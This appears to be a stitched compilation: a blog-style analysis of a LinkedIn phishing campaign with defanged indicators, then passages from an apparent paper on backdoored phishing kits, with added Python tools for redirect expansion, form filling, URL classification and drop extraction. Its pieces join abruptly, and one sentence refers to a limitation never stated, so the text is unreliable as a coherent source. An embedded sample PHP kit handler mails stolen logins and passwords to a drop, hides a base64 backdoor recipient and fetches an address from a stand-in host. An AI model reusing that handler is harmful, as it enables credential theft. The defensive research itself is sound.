Behind the shortened URL redirection

URL shorteners are a well-known vehicle for spreading malware and phishing scams, but they are also used for legitimate purposes, especially on social media, where long URLs tend to be too cumbersome. In this attack, the perpetrators are abusing both ow.ly and a free hosting provider (gdk.mx) to redirect to the phishing page, itself hosted on a hacked website.
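When triaging a campaign like this, the useful artefact is the whole redirect chain (shortener, free host, final hacked site), not just the first link. The following Python is an added example, not code from the original post: it follows Location headers one hop at a time without ever rendering the final page, resolves relative redirects, stops on loops or on a hop limit, and defangs the result in the same `[.]` style the indicators list uses. The HTTP layer is replaced by a constructed response table whose placeholder hostnames only mirror the shape of the chain above; `fetch` can be swapped for a real HEAD request that does not auto-follow redirects.

```python
from urllib.parse import urljoin

# Constructed stand-in for the HTTP layer: URL -> (status, Location header or None).
# Hostnames are placeholders shaped like the chain in the post (shortener -> free host ->
# hacked site); they are not the real indicators.
CONSTRUCTED_RESPONSES = {
    "https://shortener.example/abc123": (301, "http://freehost.example/new/index.php"),
    "http://freehost.example/new/index.php": (302, "index.php?i=1"),  # relative Location
    "http://freehost.example/new/index.php?i=1": (302, "https://hacked-site.example/wp-rxz/index.php"),
    "https://hacked-site.example/wp-rxz/index.php": (200, None),     # the phishing page itself
}

REDIRECT_STATUSES = (301, 302, 303, 307, 308)


def fake_head(url):
    """Stand-in for an HTTP HEAD that never follows redirects on its own."""
    return CONSTRUCTED_RESPONSES.get(url, (404, None))


def expand_chain(start, fetch=fake_head, max_hops=10):
    """Follow Location headers hop by hop, recording every URL visited.

    Stops on a non-redirect status, a missing Location, a loop, or max_hops.
    Returns (chain, stop_reason) so the caller can see where and why it stopped.
    """
    chain = [start]
    seen = {start}
    url = start
    for _ in range(max_hops):
        status, location = fetch(url)
        if status not in REDIRECT_STATUSES or location is None:
            return chain, f"final status {status}"
        nxt = urljoin(url, location)  # relative Location is resolved against the current URL
        chain.append(nxt)
        if nxt in seen:
            return chain, "loop"
        seen.add(nxt)
        url = nxt
    return chain, "max hops"


def defang(url):
    """Render a URL unclickable for a report, in the post's own style (scheme dropped,
    first dot of the host replaced by [.])."""
    rest = url.split("://", 1)[1] if "://" in url else url
    return rest.replace(".", "[.]", 1)


if __name__ == "__main__":
    chain, reason = expand_chain("https://shortener.example/abc123")
    for hop, u in enumerate(chain):
        print(f"hop {hop}: {defang(u)}")
    print("stopped:", reason)
```

The last element of the chain is the host worth reporting to its owner (the hacked website), while the intermediate hops are the abuse reports for the shortener and the free host.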
This email was sent via LinkedIn and had a custom 'Security Footer'. LinkedIn will send messages "that include a security footer message with your name and professional headline to help you distinguish authentic LinkedIn emails from "phishing" email messages", although it does point out that this is no guarantee that the email is legitimate. In other words, the delivery method is to be trusted, but the content may not be. The same can be said for phishing pages that use HTTPS, which is the case here: content delivery is secure, but the content itself is fraudulent.
This limitation does not apply here, though, since the crooks are not creating (and paying for) their own accounts but rather leveraging existing ones. Therefore, they have little to worry about in burning free credits and tarnishing their victim's reputation, so long as it allows them to deliver their payload far and wide.

Personal security and its implications

We do not know how (malware, other phishing attacks, etc.) or how many LinkedIn accounts were compromised in this campaign. It's also unclear whether the shortened URLs are unique per hacked account, although we think they might be. The user whose account was hacked had over 500 connections on LinkedIn and, based on Hootsuite's stats, we know 256 people clicked on the phishing link.
We'd like to thank @acfou for sharing a sample of this campaign with us.

Indicators of compromise

Phishing message:
I have just shared a document with you using GoogleDoc Drive, View shared document []

Redirection and phishing page:
ow[.]ly/qmxf30eWLyN
dgocs[.]gdk.mx/new/index.php
dgocs[.]gdk.mx/new/index.php?i=1
cakrabuanacsbali[.]com/wp-rxz/index.php

Decoy Google Docs Wells Fargo file:
docs.google.com/document/d/13qUEngtHuKjtvGoPaMl3x6cEnT2oO6lSWOccM-PkXKk/edit
Phishing is a form of identity theft in which an attacker attempts to elicit confidential information from unsuspecting victims. While in the past there has been significant work on defending from phishing, much less is known about the tools and techniques used by attackers, i.e., phishers. Of particular importance to understanding the phishers' methods and motivations are phishing kits, packages that contain complete phishing web sites in an easy-to-deploy format. In this paper, we study in detail the kits distributed for free in underground circles and those obtained by crawling live phishing sites. We notice that phishing kits often contain backdoors that send the entered information to third parties. We conclude that phishing kits target two classes of victims: the gullible users from whom they extort valuable information and the inexperienced phishers who deploy them.
The most recent step in the commoditization of phishing was the distribution of free phishing kits. These kits are actively advertised and distributed at no charge. However, as the economist Milton Friedman would have pointed out [6], there is no free lunch in the underground economy. Often, free phishing kits hide backdoors through which the phished information is sent to recipients (probably the original kits' authors) other than the intended ones. In other words, far from being a display of generosity on behalf of the authors, free phishing kits respond to rational economic motivations. That is, kit authors minimize the effort and risks associated with deploying the phishing site and attracting victims, and maximize their return on investment by harvesting the work of unwitting users.
The main contribution of this paper is the detailed analysis of the phishing kits distributed for free on underground sites as well as those left on live phishing web sites. We focus on the structure of these kits and the backdooring mechanisms used by phishers. We think that this analysis is interesting from two points of view. First, it examines in detail some of the techniques employed in phishing kits and analyzes their technical sophistication. Second, our study sheds some light on the dynamics of the phishing community. It gives additional evidence of the current transformation of underground circles into for-profit organizations [29], ruled by economic principles [5], in which more experienced practitioners resort to treachery against newcomers. This shows that miscreants do not only target unsuspecting regular users but also that they have no hesitation in attacking fellow (or competing) phishers.
The analysis that identifies recipient email addresses is automated. Each phishing kit is uploaded to a virtualized environment, consisting of an Ubuntu system equipped with the Apache web server and the PHP module. The kit is uncompressed inside the document root of the web server. Then, a browser instance is directed at the index page of the kit and used to fill in the information collected by the kit. At the end of this process, the kit sends one or more emails with the entered information.
The navigation of the phishing web site is performed using a script that leverages the Selenium library [28] to programmatically control an instance of the Firefox browser. The script requests a page, parses its content, and identifies forms and input fields. It then applies various heuristics to fill each input field with appropriate values. This is necessary since phishing kits often enforce type constraints on some inputs. For example, password values generally have a minimum length and must contain both letters and numbers; credit card numbers have a well-defined length and, at a minimum, must pass the Luhn test [14]. The phishing kit checks these constraints and refuses to complete its process (and disclose its email addresses) if these constraints are not satisfied. Note that some of the checks performed are also implemented on the original web site, while others (e.g., the Luhn test or whether a credit card number belongs to a known credit company) are inserted by the kit's authors. We recognize each input field's type by looking at the name attribute of the corresponding HTML element. The names generally indicate the intended use of the field, such as ssn (social security number) or cvv2 (card verification value).
To automate our analysis process, we need to bypass these checks. Therefore, we configured the system to use a DNS server installed locally, which defines appropriate MX records and resolves all names to the local address 127.0.0.1. Thus, the DNS server effectively redirects all the HTTP requests made by a phishing kit (using domain names rather than IP addresses) to the local web server. The web server responds to all requests for non-existent resources (such as the login page of a banking web site) with a static HTML page that contains words typically searched for by phishing kits to validate credentials.
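The form-filling step above is the part of the sandbox pipeline that most often fails in practice, because a kit that rejects one field never reaches the code path that mails the drop. The Python below is an added example, not the authors' Selenium script: it shows the field-name heuristics and the Luhn constraint in isolation, using the standard library's `html.parser` over a constructed form instead of driving Firefox, and it is meant to be plugged into whatever browser automation the analyst already uses. The field-name patterns and the placeholder values (a textbook Luhn-valid test number, an SSN in the never-issued 900 range) are my assumptions, not the paper's list.

```python
import re
from html.parser import HTMLParser

# Constructed sample of a kit's verification form; not taken from any real kit.
SAMPLE_FORM = """
<form action="login.php" method="post">
  <input type="text" name="email">
  <input type="password" name="passwd">
  <input type="text" name="cardnumber" maxlength="16">
  <input type="text" name="expmonth"> <input type="text" name="expyear">
  <input type="text" name="cvv2" maxlength="4">
  <input type="text" name="ssn">
  <input type="hidden" name="step" value="1">
  <input type="submit" value="Continue">
</form>
"""

SKIP_TYPES = {"submit", "hidden", "button", "image", "reset"}


class FormFieldCollector(HTMLParser):
    """Record the name and type of every fillable <input>/<select>/<textarea>."""

    def __init__(self):
        super().__init__()
        self.fields = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("input", "select", "textarea"):
            return
        a = dict(attrs)
        ftype = (a.get("type") or "text").lower()
        if a.get("name") and ftype not in SKIP_TYPES:
            self.fields.append((a["name"], ftype))


def collect_fields(html):
    parser = FormFieldCollector()
    parser.feed(html)
    return parser.fields


def luhn_valid(number):
    """Standard Luhn check over the digits of `number` (non-digits are ignored)."""
    digits = [int(c) for c in number if c.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:  # every second digit from the right is doubled
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return bool(digits) and total % 10 == 0


def luhn_complete(prefix):
    """Append the single check digit that makes `prefix` pass the Luhn test."""
    for check in "0123456789":
        if luhn_valid(prefix + check):
            return prefix + check
    raise ValueError("unreachable: exactly one check digit always works")


# Heuristics keyed on the HTML name attribute, tried in order; the first match wins.
# Order matters: "ssn" before "name", "cvv2" before "card", "expmonth" before "expyear".
HEURISTICS = [
    (r"ssn|social", lambda: "900-12-3456"),          # assumption: 900-range is never issued
    (r"cvv|cvc|sec", lambda: "123"),
    (r"exp.*mo|mm", lambda: "12"),
    (r"exp.*y|yy", lambda: "2030"),
    (r"e-?mail", lambda: "user@example.com"),
    (r"pass|pwd|pin", lambda: "Tr1alPass9"),          # letters and digits, 8+ characters
    (r"user|login|account", lambda: "jdoe"),
    (r"phone|tel", lambda: "202-555-0143"),
    (r"zip|postal", lambda: "20500"),
    (r"card|pan|number", lambda: luhn_complete("411111111111111")),  # -> 4111111111111111
    (r"name", lambda: "John Doe"),
]


def value_for(field_name):
    lowered = field_name.lower()
    for pattern, make in HEURISTICS:
        if re.search(pattern, lowered):
            return make()
    return "test"  # fallback for fields we cannot classify


def fill_form(html):
    """Return {field name: value} satisfying the type constraints a kit typically enforces."""
    return {name: value_for(name) for name, _ftype in collect_fields(html)}


if __name__ == "__main__":
    for name, value in fill_form(SAMPLE_FORM).items():
        print(f"{name:12} -> {value}")
```

Hidden and submit inputs are deliberately left to the browser, since a kit's multi-step flow usually keys on them; overwriting them is the quickest way to get a kit to bail out before it mails anything.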
From our automated analysis of the 503 phishing kits, we extracted 379 unique email addresses. They are registered at 60 different domains: gmail.com is the most frequently used (49%), followed by yahoo.com (18%) and hotmail.com (3%). Only 7 addresses are hosted at domains that are not free mail providers. At least one address was clearly mistyped (the top-level domain was comr instead of .com). Among the addresses obtained from live kits, 101 were present in multiple kits.
Infrastructure. In the case of live kits, it is interesting to investigate the techniques used to obfuscate the URL pointing to the phishing site. We use the classification proposed by Garera et al. [8]: type I URLs use an IP address in place of the hostname; type II URLs contain a valid-looking domain name and insert the name of the organization being phished in the path; type III URLs include the organization name in the hostname, followed by a long string; type IV URLs have no apparent relationship with the phished organization. It can be argued that type III URLs are likely to correspond to domains that were explicitly registered to host a phishing site, while type I, II, and IV URLs are more likely to correspond to vulnerable sites (for example, running web applications containing vulnerabilities) that were compromised and used to host phishing pages.
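The four URL types are easy to operationalize for a feed of known phishing URLs, which is how a responder decides whether to file a takedown with a registrar (type III) or notify a compromised site's owner (types I, II, IV). The Python below is an added example, not the paper's code: it implements the type I to IV rules as the paragraph states them over a constructed list of target organization names (the paper does not publish its list), with the host checked before the path so a URL matching both counts as type III.

```python
import ipaddress
from urllib.parse import urlparse

# Constructed list of phished organizations; the paper does not publish the one it used.
TARGET_ORGS = ("paypal", "wellsfargo", "bankofamerica", "ebay")


def classify_url(url, orgs=TARGET_ORGS):
    """Return 'I', 'II', 'III' or 'IV' following Garera et al. as summarized above.

    The input is assumed to be a URL already known to be a phishing page; the classifier
    does not try to tell a legitimate brand site from a look-alike.
    """
    if "://" not in url:
        url = "http://" + url  # bare host/path strings as found in feeds
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    path = (parsed.path + "?" + parsed.query).lower()
    try:
        ipaddress.ip_address(host)  # IPv4 or IPv6 literal in place of a hostname
        return "I"
    except ValueError:
        pass
    if any(org in host for org in orgs):
        return "III"  # organization name inside the hostname
    if any(org in path for org in orgs):
        return "II"  # valid-looking domain, organization name only in the path
    return "IV"  # no visible relationship with the phished organization


def likely_hosting(url_type):
    """The paper's reading: type III suggests a purpose-registered domain, the rest a compromised host."""
    return "registered" if url_type == "III" else "compromised"


def classify_many(urls, orgs=TARGET_ORGS):
    """Tally a feed of phishing URLs by type."""
    counts = {"I": 0, "II": 0, "III": 0, "IV": 0}
    for u in urls:
        counts[classify_url(u, orgs)] += 1
    return counts


if __name__ == "__main__":
    # Constructed sample URLs on reserved example hosts and documentation IP ranges.
    sample = [
        "http://192.0.2.10/wellsfargo/index.php",
        "http://example-blog.example/wp-content/paypal/webscr.php",
        "https://paypal.com-secure-login-3f9a1c7e2b4d.example/",
        "http://docs-share.example/new/index.php",
    ]
    for u in sample:
        t = classify_url(u)
        print(f"type {t:3} ({likely_hosting(t)}): {u}")
    print(classify_many(sample))
```

The substring match is deliberately simple; brand names split by hyphens or digits (pay-pal, paypa1) are counted as type IV, which is a known blind spot worth keeping in mind when reading the resulting counts.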
The majority of phishing kits contain all the resources required to replicate the targeted web site, including HTML pages, JavaScript and CSS files, images and other media files, such as Flash clips. This minimizes the number of requests the kit issues to the legitimate site and, thus, the chances of being detected if the target site analyzes incoming requests. However, 129 kits from distribution sites and 91 from live sites contain links to the target web sites, and 2 kits contain the Google Analytics tracker code (we could not confirm whether site traffic data is sent to the legitimate site's account or a phisher's account).
PHP scripts included in the kit handle the forms used to phish information. These scripts collect the provided information and send it to the phisher. As we have seen, drops are almost always transmitted using email. We conjecture that this is because, of all transmission methods, email does not require any additional infrastructure, does not force the attacker to visit the phishing site after the initial seeding, and is as reliable as the mail provider chosen by the phisher. Destination addresses are most often configured by setting a variable in one of the scripts. In three kits, addresses were obtained by requesting a page on a third-party site. In one case, the site was inaccessible. In the remaining two cases, it returned an obfuscated email address.
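The dynamic sandbox described earlier finds every recipient by letting the kit send mail; a quicker first pass for a responder who has a kit's source is to look at how the `mail()` calls get their first argument. The Python below is an added example, not the paper's tooling: it statically pulls the recipient from the three patterns this section and the backdoor discussion describe (a plain variable assignment, a base64-wrapped literal, and an address fetched from a third-party URL at run time), and it flags the kit when more than one recipient or any obfuscation is present. The PHP handler it runs over is constructed for the example; `.example` hosts and the addresses in it are placeholders.

```python
import base64
import binascii
import re

# Constructed excerpt modelled on a typical kit form handler; not from any real kit.
# A second recipient is hidden behind base64, as the backdoored kits described above do.
HIDDEN_B64 = base64.b64encode(b"hidden.author@example.org").decode()
SAMPLE_HANDLER = r'''<?php
$ip = getenv("REMOTE_ADDR");
$message = "Login: " . $_POST['login'] . "\n";
$message .= "Password: " . $_POST['passwd'] . "\n";
$send = "drop.owner@example.com";        // the deployer's configured drop address
$subject = "New result from $ip";
$headers = "From: Kit <no-reply@example.net>\r\n";
mail($send, $subject, $message, $headers);
mail(base64_decode("__B64__"), $subject, $message, $headers);   // backdoor copy
$extra = file_get_contents("http://kit-author.example/drop.txt"); // drop fetched at run time
header("Location: https://www.example.com/");
?>'''.replace("__B64__", HIDDEN_B64)

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# $var = "literal";  (only single-line string literals are resolved)
ASSIGN_RE = re.compile(r"(\$\w+)\s*=\s*(['\"])(.*?)\2\s*;")
# first argument of mail(): everything up to the first comma
MAIL_RE = re.compile(r"\bmail\s*\(\s*([^,]+?)\s*,")
B64_RE = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
REMOTE_RE = re.compile(r"\b(?:file_get_contents|fopen|curl_init)\s*\(\s*['\"](https?://[^'\"]+)['\"]")


def extract_drops(php_source):
    """Statically recover where a kit's handler sends the phished data."""
    variables = {}
    for var, _quote, value in ASSIGN_RE.findall(php_source):
        m = EMAIL_RE.search(value)
        if m:
            variables[var] = m.group(0)

    recipients, obfuscated = [], []
    for arg in MAIL_RE.findall(php_source):
        b64 = B64_RE.search(arg)
        if b64:
            try:
                decoded = base64.b64decode(b64.group(1)).decode("utf-8", "replace")
            except binascii.Error:
                continue
            m = EMAIL_RE.search(decoded)
            if m:
                recipients.append(m.group(0))
                obfuscated.append(m.group(0))
            continue
        if arg.startswith("$"):
            if arg in variables:  # recipient set through a configuration variable
                recipients.append(variables[arg])
            continue
        m = EMAIL_RE.search(arg)  # recipient passed as a string literal
        if m:
            recipients.append(m.group(0))

    remote = REMOTE_RE.findall(php_source)
    return {
        "recipients": recipients,
        "obfuscated": obfuscated,
        "remote_sources": remote,
        "all_addresses": sorted(set(EMAIL_RE.findall(php_source))),  # what a plain grep sees
        "backdoor_suspected": len(set(recipients)) > 1 or bool(obfuscated) or bool(remote),
    }


if __name__ == "__main__":
    for key, value in extract_drops(SAMPLE_HANDLER).items():
        print(f"{key:18} {value}")
```

Note the gap between `all_addresses` and `recipients`: a text search of the kit finds the deployer's drop and the From header but misses the base64 recipient entirely, which is exactly why the authors fall back to running the kit and watching what it mails.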
A second area of work consists of the design and implementation of methods to prevent phishing attacks. Some of these techniques are automatic and are based, for example, on the filtering of web page contents [16], the restriction of information flow [13, 25, 34], or the obfuscation of confidential information [26]. Other prevention techniques require some form of cooperation from the user, for example, a reaction to visual cues in the browser [2, 9], or the use of external trusted devices [23]. Several studies have pointed out the limitations of approaches that require human intervention [11, 27, 33].